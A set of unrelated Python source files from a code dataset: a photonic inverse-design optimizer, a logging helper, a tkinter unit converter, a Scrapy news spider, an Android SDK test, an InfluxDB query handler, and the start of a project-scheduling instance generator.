compute_fd_imag[ 0 : num ], color='r', linewidth=2, linestyle='--' )\t\t\n\t\tplt.subplot( 1, 3, 3 )\n\t\tplt.plot( ( self.coarsen_factor**2 ) * get_grad_density[ fd_x_density, 0 : num ], color='g', linewidth=2 )\n\t\tplt.plot( compute_fd_density[ 0 : num ], color='r', linewidth=2, linestyle='--' )\t\t\n\t\tplt.show()\n\n\tdef density_to_permittivity( self, density ):\n\t\treturn ( self.min_relative_permittivity + ( self.max_relative_permittivity - self.min_relative_permittivity ) * density )\n\n\tdef layer_spacer_averaging( self, gradient_input ):\n\t\tgradient_output = np.zeros( gradient_input.shape )\n\n\t\tfor layer_idx in range( 0, self.num_layers ):\n\t\t\tlayer_start = layer_idx * self.design_voxels_per_layer\n\t\t\tlayer_end = layer_start + self.design_voxels_per_layer\n\n\t\t\tfill_gradient = np.zeros( self.design_width_voxels )\n\n\t\t\tif self.designable_layer_indicators[ layer_idx ]:\n\t\t\t\tfill_gradient = np.mean( gradient_input[ :, layer_start : layer_end ], axis=1 )\n\n\t\t\tfor internal_layer_idx in range( layer_start, layer_end ):\n\t\t\t\tgradient_output[ :, internal_layer_idx ] = fill_gradient\n\n\t\treturn gradient_output\n\n\tdef step_binarize( self, gradient, binarize_amount, binarize_max_movement, opt_mask ):\n\n\t\tdensity_for_binarizing = self.design_density.flatten()\n\t\tflatten_gradient = gradient.flatten()\n\n\t\t# flatten_design_cuts = density_for_binarizing.copy()\n\t\textract_binarization_gradient_full = compute_binarization_gradient( density_for_binarizing, self.binarization_set_point )\n\t\t# flatten_fom_gradients = flatten_gradient.copy()\n\t\tflatten_opt_mask = opt_mask.flatten()\n\n\n\t\tflatten_design_cuts = []\n\t\tflatten_fom_gradients = []\n\t\textract_binarization_gradient = []\n\n\t\tfor idx in range( 0, len( flatten_opt_mask ) ):\n\t\t\tif flatten_opt_mask[ idx ] > 0:\n\t\t\t\tflatten_design_cuts.append( density_for_binarizing[ idx ] )\n\t\t\t\tflatten_fom_gradients.append( flatten_gradient[ idx ] )\n\t\t\t\textract_binarization_gradient.append( extract_binarization_gradient_full[ idx ] )\n\n\t\tflatten_design_cuts = np.array( flatten_design_cuts )\n\t\tflatten_fom_gradients = np.array( flatten_fom_gradients )\n\t\textract_binarization_gradient = np.array( extract_binarization_gradient )\n\n\t\tbeta = binarize_max_movement\n\t\tprojected_binarization_increase = 0\n\n\t\tc = flatten_fom_gradients\n\n\t\tinitial_binarization = compute_binarization( flatten_design_cuts, self.binarization_set_point )\n\n\t\tb = np.real( extract_binarization_gradient )\n\n\t\tlower_bounds = np.zeros( len( c ) )\n\t\tupper_bounds = np.zeros( len( c ) )\n\n\t\tfor idx in range( 0, len( c ) ):\n\t\t\tupper_bounds[ idx ] = np.maximum( np.minimum( beta, 1 - flatten_design_cuts[ idx ] ), 0 )\n\t\t\tlower_bounds[ idx ] = np.minimum( np.maximum( -beta, -flatten_design_cuts[ idx ] ), 0 )\n\n\t\tmax_possible_binarization_change = 0\n\t\tfor idx in range( 0, len( c ) ):\n\t\t\tif b[ idx ] > 0:\n\t\t\t\tmax_possible_binarization_change += b[ idx ] * upper_bounds[ idx ]\n\t\t\telse:\n\t\t\t\tmax_possible_binarization_change += b[ idx ] * lower_bounds[ idx ]\n\t\t\n\t\t# Try this! Not sure how well it will work\n\t\t# if initial_binarization < 0.1:\n\t\t# \talpha = binarize_amount\n\t\t# else:\n\t\t\t# alpha = np.minimum( initial_binarization * max_possible_binarization_change, binarize_amount )\n\t\talpha = np.minimum( max_possible_binarization_change, binarize_amount )\n\n\t\tdef ramp( x ):\n\t\t\treturn np.maximum( x, 0 )\n\n\t\tdef opt_function( nu ):\n\t\t\tlambda_1 = ramp( nu * b - c )\n\t\t\tlambda_2 = c + lambda_1 - nu * b\n\n\t\t\treturn -( -np.dot( lambda_1, upper_bounds ) + np.dot( lambda_2, lower_bounds ) + nu * alpha )\n\n\t\ttolerance = 1e-12\n\t\toptimization_solution_nu = scipy.optimize.minimize( opt_function, 0, tol=tolerance )\n\n\t\tnu_star = optimization_solution_nu.x\n\t\tlambda_1_star = ramp( nu_star * b - c )\n\t\tlambda_2_star = c + lambda_1_star - nu_star * b\n\t\tx_star = np.zeros( len( c ) )\n\n\t\tfor idx in range( 0, len( c ) ):\n\t\t\tif lambda_1_star[ idx ] > 0:\n\t\t\t\tx_star[ idx ] = upper_bounds[ idx ]\n\t\t\telse:\n\t\t\t\tx_star[ idx ] = lower_bounds[ idx ]\n\n\n\t\tproposed_design_variable = flatten_design_cuts + x_star\n\t\tproposed_design_variable = np.minimum( np.maximum( proposed_design_variable, 0 ), 1 )\n\n\t\trefill_idx = 0\n\t\trefill_design_variable = density_for_binarizing.copy()\n\t\tfor idx in range( 0, len( flatten_opt_mask ) ):\n\t\t\tif flatten_opt_mask[ idx ] > 0:\n\t\t\t\trefill_design_variable[ idx ] = proposed_design_variable[ refill_idx ]\n\t\t\t\trefill_idx += 1\n\n\t\treturn np.reshape( refill_design_variable, self.design_density.shape )\n\n\tdef get_device_permittivity( self ):\n\t\timport_density = upsample( self.design_density, self.coarsen_factor )\n\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\treturn device_permittivity\n\n\tdef pair_array( self, input_array ):\n\t\toutput_array = np.zeros( input_array.shape, dtype=input_array.dtype )\n\t\tfor pair_idx in range( 0, len( self.density_pairings ) ):\n\t\t\tget_pair = self.density_pairings[ pair_idx ]\n\t\t\tdensity0 = input_array[ get_pair[ 0 ], get_pair[ 1 ] ]\n\t\t\tdensity1 = input_array[ get_pair[ 2 ], get_pair[ 3 ] ]\n\n\t\t\tdensity_average = 0.5 * ( density0 + density1 )\n\n\t\t\toutput_array[ get_pair[ 0 ], get_pair[ 1 ] ] = density_average\n\t\t\toutput_array[ get_pair[ 2 ], get_pair[ 3 ] ] = density_average\n\n\t\treturn output_array\n\n\tdef optimize_vote(\n\t\tself, num_iterations,\n\t\tfolder_for_saving ):\n\n\t\tself.fom_evolution = np.zeros( num_iterations )\n\t\tself.density_evolution = np.zeros( ( num_iterations, self.design_width_voxels, self.design_height_voxels ) )\n\n\t\tmake_sigmoid = sigmoid.Sigmoid( 0.5, 2.0 )\n\n\t\tdef density_to_fom_and_grad( test_density ):\n\t\t\timport_density = upsample( test_density, self.coarsen_factor )\n\t\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\t\tgradient_by_wl = []\n\t\t\tfom_by_wl = []\n\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\tget_focal_point_idx = self.wavelength_idx_to_focal_idx[ wl_idx ]\n\n\t\t\t\tget_fom, get_grad = self.compute_fom_and_gradient(\n\t\t\t\t\tself.omega_values[ wl_idx ], device_permittivity, self.focal_spots_x_voxels[ get_focal_point_idx ],\n\t\t\t\t\tself.wavelength_intensity_scaling[ wl_idx ] )\n\n\t\t\t\tscale_fom_for_wl = get_fom\n\n\t\t\t\tupsampled_device_grad = get_grad[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\t\t\t\tscale_gradient_for_wl = upsampled_device_grad\n\n\t\t\t\tgradient_by_wl.append( scale_gradient_for_wl )\n\t\t\t\tfom_by_wl.append( scale_fom_for_wl )\n\n\n\t\t\tnet_fom = np.product( fom_by_wl )\n\t\t\tnet_gradient = np.zeros( gradient_by_wl[ 0 ].shape )\n\n\t\t\t# We are currently not doing a performance based weighting here, but we can add it in\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\twl_gradient = np.real( self.max_relative_permittivity - self.min_relative_permittivity ) * gradient_by_wl[ wl_idx ]\n\t\t\t\tweighting = net_fom / fom_by_wl[ wl_idx ]\n\n\t\t\t\tnet_gradient += ( weighting * wl_gradient )\n\n\t\t\tnet_gradient = reinterpolate_average( net_gradient, self.coarsen_factor )\n\n\n\t\t\t#\n\t\t\t# Now, we should zero out non-designable regions and average over designable layers\n\t\t\t#\n\t\t\tnet_gradient = self.layer_spacer_averaging( net_gradient )\n\t\t\tgradient_norm = vector_norm( net_gradient )\n\n\t\t\t# Using a scaled gradient might mess up the comparison between different iterations in terms of gradient\n\t\t\t# magnitude\n\t\t\tnorm_scaled_gradient = net_gradient / gradient_norm\n\n\t\t\treturn net_fom, norm_scaled_gradient\n\n\t\tself.design_density = 1.0 * np.greater(\n\t\t\tnp.random.random( ( self.design_width_voxels, self.design_height_voxels ) ),\n\t\t\t0.5 )\n\n\t\tfor iter_idx in range( 0, num_iterations ):\n\t\t\tif ( iter_idx % 10 ) == 0:\n\t\t\t\tlog_file = open( self.save_folder + \"/log.txt\", 'a' )\n\t\t\t\tlog_file.write( \"Iteration \" + str( iter_idx ) + \" out of \" + str( num_iterations - 1 ) + \"\\n\")\n\t\t\t\tlog_file.close()\n\n\t\t\teval_fom, eval_grad = density_to_fom_and_grad( self.design_density )\n\n\t\t\tprint( eval_fom )\n\n\t\t\tself.fom_evolution[ iter_idx ] = eval_fom\n\t\t\tself.density_evolution[ iter_idx ] = self.design_density\n\n\t\t\tprobability_norm = 0.0\n\t\t\tfor x_idx in range( 0, self.design_width_voxels ):\n\t\t\t\tfor y_idx in range( 0, self.design_height_voxels ):\n\t\t\t\t\tget_value = self.design_density[ x_idx, y_idx ]\n\t\t\t\t\tget_grad = eval_grad[ x_idx, y_idx ]\n\t\t\t\t\tif ( get_value > 0.5 ) and ( get_grad < 0 ):\n\t\t\t\t\t\tprobability_norm += np.abs( get_grad )\n\t\t\t\t\telif ( get_value < 0.5 ) and ( get_grad > 0 ):\n\t\t\t\t\t\tprobability_norm += np.abs( get_grad )\n\n\t\t\tif probability_norm > 0:\n\t\t\t\teval_grad /= ( probability_norm / 10. )\n\t\t\telse:\n\t\t\t\tbreak\n\n\t\t\tfor x_idx in range( 0, self.design_width_voxels ):\n\t\t\t\tfor y_idx in range( 0, self.design_height_voxels ):\n\t\t\t\t\tget_value = self.design_density[ x_idx, y_idx ]\n\t\t\t\t\tget_grad = eval_grad[ x_idx, y_idx ]\n\t\t\t\t\tif ( get_value > 0.5 ) and ( get_grad < 0 ):\n\t\t\t\t\t\tif np.random.random() < np.abs( get_grad ):\n\t\t\t\t\t\t\tself.design_density[ x_idx, y_idx ] = 0.0\n\t\t\t\t\telif ( get_value < 0.5 ) and ( get_grad > 0 ):\n\t\t\t\t\t\tif np.random.random() < np.abs( get_grad ):\n\t\t\t\t\t\t\tself.design_density[ x_idx, y_idx ] = 1.0\n\n\n\t\t\tnp.save( folder_for_saving + \"_fom_evolution.npy\", self.fom_evolution )\n\t\t\tnp.save( folder_for_saving + \"_density_evolution.npy\", self.density_evolution )\n\n\n\tdef optimize(\n\t\tself, num_iterations,\n\t\tfolder_for_saving ):\n\n\t\tself.fom_evolution = np.zeros( num_iterations )\n\t\tself.density_prediction_evolution = np.zeros( ( num_iterations, self.design_width_voxels, self.design_height_voxels ) )\n\n\t\tmake_sigmoid = sigmoid.Sigmoid( 0.5, 2.0 )\n\n\t\tdef density_to_fields_fom_and_grad( test_density ):\n\t\t\timport_density = upsample( test_density, self.coarsen_factor )\n\t\t\tdevice_permittivity = self.density_to_permittivity( import_density )\n\n\t\t\tgradient_by_wl = []\n\t\t\tfom_by_wl = []\n\t\t\treal_fields_by_wl = []\n\t\t\timag_fields_by_wl = []\n\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\tget_focal_point_idx = self.wavelength_idx_to_focal_idx[ wl_idx ]\n\n\t\t\t\tget_fom, get_grad, get_Ez = self.compute_fom_and_gradient_and_fields(\n\t\t\t\t\tself.omega_values[ wl_idx ], device_permittivity, self.focal_spots_x_voxels[ get_focal_point_idx ],\n\t\t\t\t\tself.wavelength_intensity_scaling[ wl_idx ] )\n\n\t\t\t\tscale_fom_for_wl = get_fom\n\n\t\t\t\tupsampled_device_grad = get_grad[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ]\n\t\t\t\tscale_gradient_for_wl = upsampled_device_grad\n\n\t\t\t\tgradient_by_wl.append( scale_gradient_for_wl )\n\t\t\t\tfom_by_wl.append( scale_fom_for_wl )\n\n\t\t\t\treal_fields_by_wl.append(\n\t\t\t\t\treinterpolate_average( \n\t\t\t\t\t\tnp.real( get_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] ),\n\t\t\t\t\t\tself.coarsen_factor ) )\n\t\t\t\timag_fields_by_wl.append(\n\t\t\t\t\treinterpolate_average( \n\t\t\t\t\t\tnp.imag( get_Ez[ self.device_width_start : self.device_width_end, self.device_height_start : self.device_height_end ] ),\n\t\t\t\t\t\tself.coarsen_factor ) )\n\n\t\t\tnet_fom = np.product( fom_by_wl )\n\t\t\tnet_gradient = np.zeros( gradient_by_wl[ 0 ].shape )\n\n\t\t\t# We are currently not doing a performance based weighting here, but we can add it in\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\twl_gradient = np.real( self.max_relative_permittivity - self.min_relative_permittivity ) * gradient_by_wl[ wl_idx ]\n\t\t\t\tweighting = net_fom / fom_by_wl[ wl_idx ]\n\n\t\t\t\tnet_gradient += ( weighting * wl_gradient )\n\n\t\t\tnet_gradient = reinterpolate_average( net_gradient, self.coarsen_factor )\n\n\n\t\t\t#\n\t\t\t# Now, we should zero out non-designable regions and average over designable layers\n\t\t\t#\n\t\t\tnet_gradient = self.layer_spacer_averaging( net_gradient )\n\t\t\tgradient_norm = vector_norm( net_gradient )\n\n\t\t\t# Using a scaled gradient might mess up the comparison between different iterations in terms of gradient\n\t\t\t# magnitude\n\t\t\tnorm_scaled_gradient = net_gradient / gradient_norm\n\n\t\t\treturn net_fom, net_gradient, real_fields_by_wl, imag_fields_by_wl\n\n\n\t\tnp.random.seed( 2143123 )\n\t\tnetwork_input_np = np.random.random( ( 1, 2 * self.num_wavelengths + 1, self.design_width_voxels, self.design_height_voxels ) ) - 0.5\n\t\tnetwork_input_np[ 0, 0 ] += 0.5\n\t\tpreinput_sigmoid = network_input_np[ 0, 0 ]\n\t\tnetwork_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\t\tkernel_size = 3\n\t\tmake_net = PermittivityPredictor( self.num_wavelengths, kernel_size )\n\n\t\tget_density_predictions = make_net.forward( torch.tensor( network_input_np, requires_grad=True ).float() )[ 0, 0 ]\n\n\t\tpreinput_sigmoid = get_density_predictions.detach().numpy()\n\t\tnetwork_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\t\teval_fom, eval_grad, eval_real_fields, eval_imag_fields = density_to_fields_fom_and_grad( network_input_np[ 0, 0 ] )\n\n\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx ] = eval_real_fields[ wl_idx ]\n\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx + 1 ] = eval_imag_fields[ wl_idx ]\n\n\n\n\t\toptimizer = torch.optim.SGD( make_net.parameters(), lr=100.0 )\n\n\t\tfor iter_idx in range( 0, num_iterations ):\n\t\t\tif ( iter_idx % 10 ) == 0:\n\t\t\t\tlog_file = open( self.save_folder + \"/log.txt\", 'a' )\n\t\t\t\tlog_file.write( \"Iteration \" + str( iter_idx ) + \" out of \" + str( num_iterations - 1 ) + \"\\n\")\n\t\t\t\tlog_file.close()\n\n\t\t\tsigmoid_backprop = make_sigmoid.chain_rule( -eval_grad, network_input_np[ 0, 0 ], preinput_sigmoid )\n\n\t\t\toptimizer.zero_grad()\n\t\t\tloss = ( torch.tensor( sigmoid_backprop ).float() * get_density_predictions ).sum()\n\t\t\tloss.backward()\n\t\t\toptimizer.step()\n\n\t\t\tprint( eval_fom )\n\n\t\t\t# network_input_np[ 0, 0 ] = np.greater_equal( get_density_predictions.detach().numpy(), 0.5 )\n\t\t\t# preinput_sigmoid = get_density_predictions.detach().numpy()\n\t\t\t# network_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\n\t\t\tget_density_predictions = make_net.forward( torch.tensor( network_input_np, requires_grad=True ).float() )[ 0, 0 ]\n\n\t\t\tpreinput_sigmoid = get_density_predictions.detach().numpy()\n\t\t\tnetwork_input_np[ 0, 0 ] = make_sigmoid.forward( preinput_sigmoid )# 1.0 * np.greater_equal( network_input_np[ 0, 0 ], 0.5 )\n\n\t\t\t# binarize_predictions = np.greater_equal( np.squeeze( get_density_predictions.detach().numpy() ), 0.5 )\n\t\t\teval_fom, eval_grad, eval_real_fields, eval_imag_fields = density_to_fields_fom_and_grad( network_input_np[ 0, 0 ] )\n\n\n\t\t\tfor wl_idx in range( 0, self.num_wavelengths ):\n\t\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx ] = eval_real_fields[ wl_idx ]\n\t\t\t\tnetwork_input_np[ 0, 1 + 2 * wl_idx + 1 ] = eval_imag_fields[ wl_idx ]\n\n\n\t\t\tself.fom_evolution[ iter_idx ] = eval_fom\n\t\t\tself.density_prediction_evolution[ iter_idx ] = get_density_predictions.detach().numpy()\n\n\t\t\tnp.save( folder_for_saving + \"_fom_evolution.npy\", self.fom_evolution )\n\t\t\tnp.save( folder_for_saving + \"_density_prediction_evolution.npy\", self.density_prediction_evolution )\n\n\n\tdef save_optimization_data( self, file_base ):\n\t\tnp.save( file_base + \"_fom_evolution.npy\", self.fom_evolution )\n\t\t# np.save( file_base + \"_density_prediction_evolution.npy\", self.density_prediction_evolution )\n\t\tnp.save( folder_for_saving + \"_density_evolution.npy\", self.density_evolution )\n\n\n\n","sub_path":"inverse_design/Landscape/ColorSplittingOptimizationDeep2D.py","file_name":"ColorSplittingOptimizationDeep2D.py","file_ext":"py","file_size_in_byte":48045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"48199262","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\fragmap\\debug.py\n# Compiled at: 2019-09-05 13:55:36\n# Size of source mod 2**32: 1524 bytes\nimport argparse, sys, logging\n_logging_categories = [\n 'grid', 'sorting', 'grouping', 'parser', 'update', 'console', 'test', 'matrix']\n_enable_logging = {category:False for category in _logging_categories}\nlogging.basicConfig()\nfor cat in _logging_categories:\n l = logging.getLogger(cat)\n l.setLevel(logging.CRITICAL)\n\ndef is_logging(category):\n return _enable_logging[category]\n\n\ndef enable_logging(category):\n if category in _logging_categories:\n get(category).setLevel(logging.DEBUG)\n _enable_logging[category] = True\n else:\n print(\"WARNING: Unknown logging category '{}'\".format(category))\n\n\ndef get(category):\n return logging.getLogger(category)\n\n\ndef parse_args(extendable=False):\n p = argparse.ArgumentParser(add_help=(not extendable))\n p.add_argument('--log', nargs='+', choices=([\n 'all'] + _logging_categories),\n metavar='CATEGORY',\n help='Which categories of log messages to send to standard output: %(choices)s')\n args, unknown_args = p.parse_known_args()\n if args.log:\n if args.log[0] == 'all':\n args.log = _logging_categories\n for cat in args.log:\n if cat == 'all':\n pass\n else:\n enable_logging(cat)\n\n sys.argv[1:] = unknown_args\n if extendable:\n return p","sub_path":"pycfiles/fragmap-0.3.1-py3.6/debug.cpython-36.py","file_name":"debug.cpython-36.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"541646803","text":"import tkinter\nfrom tkinter import ttk\nimport unit_manager\nimport converter\n\nclass app (tkinter.Tk):\n\tdef __init__(self, parent, units, converter):\n\t\ttkinter.Tk.__init__(self, parent)\n\t\tself.units = units\n\t\tself.con = converter\n\t\tself.parent = parent\n\t\tself.initialize()\n\n\tdef initialize(self):\n\t\tself.grid()\n\n\t\tself.unitGroupVar = tkinter.StringVar()\n\t\tself.groupCombo = ttk.Combobox(self, textvariable=self.unitGroupVar, values=self.units.getGroupsList(), justify=tkinter.CENTER, state=\"readonly\")\n\t\tself.groupCombo.current(0)\n\t\tself.groupCombo.bind(\"<>\", lambda event: self.setGroup(self.unitGroupVar.get(), event))\n\t\tself.groupCombo.grid(row=0, column=0, columnspan=2, sticky=\"EW\")\n\n\t\tself.inUnitVar = tkinter.StringVar()\n\t\tself.inUnitCombo = ttk.Combobox(self, textvariable=self.inUnitVar, values=self.units.getUnitsList(self.unitGroupVar.get()), justify=tkinter.CENTER, state=\"readonly\")\n\t\tself.inUnitCombo.current(0)\n\t\tself.inUnitCombo.bind(\"<>\", self.resetValues)\n\t\tself.inUnitCombo.grid(row=1, column=0, sticky=\"EW\")\n\n\t\tself.outUnitVar = tkinter.StringVar()\n\t\tself.outUnitCombo = ttk.Combobox(self, textvariable=self.outUnitVar, values=self.units.getUnitsList(self.unitGroupVar.get()), justify=tkinter.CENTER, state=\"readonly\")\n\t\tself.outUnitCombo.current(0)\n\t\tself.outUnitCombo.bind(\"<>\", self.resetValues)\n\t\tself.outUnitCombo.grid(row=1, column=1, sticky=\"EW\")\n\n\t\tself.inValueVar = tkinter.DoubleVar()\n\t\tself.inValueEntry = tkinter.Entry(self, textvariable=self.inValueVar, justify=tkinter.CENTER)\n\t\tself.inValueEntry.bind(\"\", self.convert)\n\t\tself.inValueEntry.grid(row=2, column=0, sticky=\"EW\")\n\n\t\tself.outValueVar = tkinter.DoubleVar()\n\t\toutValueLabel = tkinter.Label(self, textvariable=self.outValueVar, justify=tkinter.CENTER)\n\t\toutValueLabel.grid(row=2, column=1, sticky=\"EW\")\n\n\t\tcalculateButton = tkinter.Button(self, text=\"Calculate\", command=self.convert)\n\t\tcalculateButton.grid(row=3, column=0, columnspan=2, sticky=\"EW\")\n\n\t\tself.columnconfigure(0, weight=1)\n\t\tself.columnconfigure(1, weight=1)\n\t\tself.resizable(True, False)\n\t\tself.update()\n\t\tself.geometry(self.geometry())\n\t\tself.minsize(self.winfo_width(), self.winfo_height())\n\n\tdef setGroup(self, var, evt):\n\t\tself.inUnitCombo.configure(values=self.units.getUnitsList(self.unitGroupVar.get()))\n\t\tself.outUnitCombo.configure(values=self.units.getUnitsList(self.unitGroupVar.get()))\n\t\tself.inUnitCombo.current(0)\n\t\tself.outUnitCombo.current(0)\n\t\tself.resetValues(None)\n\n\tdef resetValues(self, evt):\n\t\tself.inValueVar.set(0.0)\n\t\tself.outValueVar.set(0.0)\n\n\tdef convert(self, evt=None):\n\t\ttry:\n\t\t\tself.inValueEntry.configure(foreground=\"black\")\n\t\t\tvalue = self.inValueVar.get()\n\t\t\tself.outValueVar.set(self.con.convert(value, self.inUnitVar.get(), self.outUnitVar.get()))\n\n\t\texcept ValueError:\n\t\t\tself.inValueEntry.configure(foreground=\"red\")\n\t\t\tself.outValueVar.set(0.0)\n\nif __name__ == \"__main__\":\n\tmanager = unit_manager.unit_manager()\n\tcon = converter.converter(manager)\n\tapp = app(None, manager, con)\n\tapp.title(\"Unit Calculator\")\n\tapp.mainloop()","sub_path":"Python/Unit Calculator/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"549438838","text":"import scrapy\nfrom bs4 import BeautifulSoup, Comment\nimport re\n\nclass NewsSpider(scrapy.Spider):\n\n name = 'news'\n start_urls = ['http://racc.edu/News/default.aspx']\n\n def parse(self, response):\n\n # Beatifulsoup takes over the complete response html\n soup = BeautifulSoup(response.text, 'lxml')\n content = soup.find(id=\"content\")\n\n # remove html comments from it.\n for child in content:\n if isinstance(child, Comment):\n child.extract()\n\n x = 0\n\n articles = content.findAll('article')\n articles.reverse()\n\n for art in articles:\n\n body = art.span\n if body is None:\n body = ''\n else:\n pattern = re.compile(r'\\s+')\n body = \"\".join(str(item) for item in body.contents)\n body = re.sub(pattern, ' ', body).strip()\n\n x += 1\n\n yield {\n 'id': x,\n 'title': art.h2.get_text(),\n 'excerpt': art.p.get_text(),\n 'body': '

' + art.p.get_text().encode(\"UTF-8\") + '

' + body\n }","sub_path":"racc/scrapper/spiders/news_scrapy.py","file_name":"news_scrapy.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"240410648","text":"import subprocess\n\nimport pytest\n\nfrom briefcase.exceptions import BriefcaseCommandError\n\n\ndef test_upgrade(mock_sdk):\n \"sdkmanager can be use to upgrade the Android SDK\"\n mock_sdk.upgrade()\n\n mock_sdk.command.subprocess.run.assert_called_once_with(\n [str(mock_sdk.sdkmanager_path), \"--update\"],\n env=mock_sdk.env,\n check=True,\n )\n\n\ndef test_upgrade_failure(mock_sdk):\n \"If sdkmanager fails, an error is raised\"\n mock_sdk.command.subprocess.run.side_effect = subprocess.CalledProcessError(1, \"\")\n with pytest.raises(BriefcaseCommandError):\n mock_sdk.upgrade()\n\n mock_sdk.command.subprocess.run.assert_called_once_with(\n [str(mock_sdk.sdkmanager_path), \"--update\"],\n env=mock_sdk.env,\n check=True,\n )\n","sub_path":"tests/integrations/android_sdk/AndroidSDK/test_upgrade.py","file_name":"test_upgrade.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"437305009","text":"from controllers.tag import parse_tag_string\nimport json\nimport logging\nfrom database.influxdb import db\n\nfrom .default import DefaultRequestHandler\n\n\nclass DataRequestHandler(DefaultRequestHandler):\n async def get(self, database: str, measurement: str):\n db.switch_database(database)\n\n fields_string = self.get_argument('fields')\n tags_string = self.get_argument('tags')\n init_dt = self.get_argument('init_dt', None)\n end_dt = self.get_argument('end_dt', None)\n group_by = self.get_argument('group_by_time', None)\n\n group_by_str = ''\n if group_by is not None:\n group_by_str = f'GROUP BY time({group_by})'\n fields = parse_tag_string(fields_string)\n fields_str = ', '.join(\n [f'{v}(\"{k}\") AS \"{v}_{k}\"' for k, v in fields.items()])\n else:\n fields_str = ', '.join(fields_string.split(','))\n\n tags = parse_tag_string(tags_string)\n tags_str = \"(\" + \"AND \".join(\n [f'\"{k}\"' + f\"='{v}'\" for k, v in tags.items()]) + \")\"\n\n if init_dt is None and end_dt is None:\n time_str = f\"time > now() - 1h\"\n else:\n time_str = f\"time >= '{init_dt}' AND time < '{end_dt}'\"\n\n query = (f\"SELECT {fields_str} \"\n f' FROM \"{database}\".\"autogen\".\"{measurement}\" '\n f\" WHERE {time_str} AND {tags_str}\"\n f\" {group_by_str}\")\n\n print(query)\n res = db.query(query)\n res = list(res.get_points())\n self.write(json.dumps(res))\n","sub_path":"controllers/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"122403085","text":"import math\nimport random\nimport sys\nimport copy\nimport matplotlib.pyplot as plt\nfrom abc import ABCMeta, abstractmethod\nfrom typing import TypeVar, Generic, List\nimport numpy as np\nfrom plotly.validators.surface.contours.x import project\n\n\"\"\" Important parts on MOCell:\n S: Number of Skills\n T: Number of Tasks\n E: Number of Employees\n Solution class object: Make a 2-dimensional employee allocation matrix and save each employee's working hour for each task. It's form is 1-dimensional array with size T * E. It also saves the size T * E and the location (the index of the individual).\n SBX crossover: Implemented that operator\n Mutation: change 1 variable among T*E elements in the employee allocation matrix for 2 offspring genes\n Selecting parent: pick 2 among the 8 neighbors of the current population. Neighbor doesn't occur after that in the remaining evaluation cycle.\n crossover: define SBX operator and apply execute function to the parents and put them into the offspring\n Solve TPG: ...\n Replacement on the current population: replacing the individual's parameter (employee allocation matrix) by offspring[0]'s one after comparing fitness of the original one and the offspring[0] (and add that offspring[0] to archive) (Note that picking individual from current population is done by shallow copy (referencing), not by deep copy (which should be copied by copy.deepcopy(nameOfObject)).\n\n Changes to adapt to NSGA-II:\n - do non-dominated sort on initial population based on the fitness. (Note that pareto-front on single-objective task is just a sorting)\n - Assign crowding distance : non needed for single object task, but if it becomes MO, do that\n - Selection for crossover/mutation: use crowded comparison operator for binary tournament selection - select currentPopulation times. (Find other implementations)\n - crossover: do on the offspring by SBX\n - mutation:\n - recombination: pick the best currentPopulation genes (it performs non-dominated sort and crowding distance computation), and go to the selection process.\n \"\"\"\n\n#####################instance_generator.py###############################3\nclass Task(object):\n \"\"\"docstring for Task\"\"\"\n def __init__(self, taskId, cost, skills):\n super(Task, self).__init__()\n self.taskId = taskId\n self.cost = cost\n self.skills = skills\nclass Employee(object):\n \"\"\"docstring for Employee\"\"\"\n def __init__(self, employeeId, salary, skills, team):\n super(Employee, self).__init__()\n self.employeeId = employeeId\n self.salary = salary\n self.skills = skills\n self.team = team\n\n'''\n# randomize the number of skills between 5 and 10 inclusively\nS = random.randint(7,10)\n\n# randomize the number of tasks between 5 and 10 inclusively\nT = random.randint(5,10)\n\ntasks = []\n\n# generate tasks\nfor i in range(1, T+1):\n # sample a cost from a normal distribution with mu=10 and std=5\n cost = round(np.random.normal(10,5))\n\n skills = []\n\n # randomize number of skills required for this task\n numSkills = random.randint(2,3)\n\n\n # randomize skills for this task\n for j in range(numSkills):\n r = random.randint(1, S)\n # remove duplication\n while (r in skills):\n r = random.randint(1, S)\n skills.append(r)\n\n # maintain the skill list as sorted\n skills.sort()\n # add task instance to task list\n tasks.append(Task(i, cost, skills))\n\n# randomize the rate of edge/task in the Task Precedence Graph\nevRate = np.random.normal(1.5,0.5)\nnumEdge = round(evRate * float(T))\n\nTPG = []\ncountEdge = 0\n\n# randomize a number of edges (a, b) in 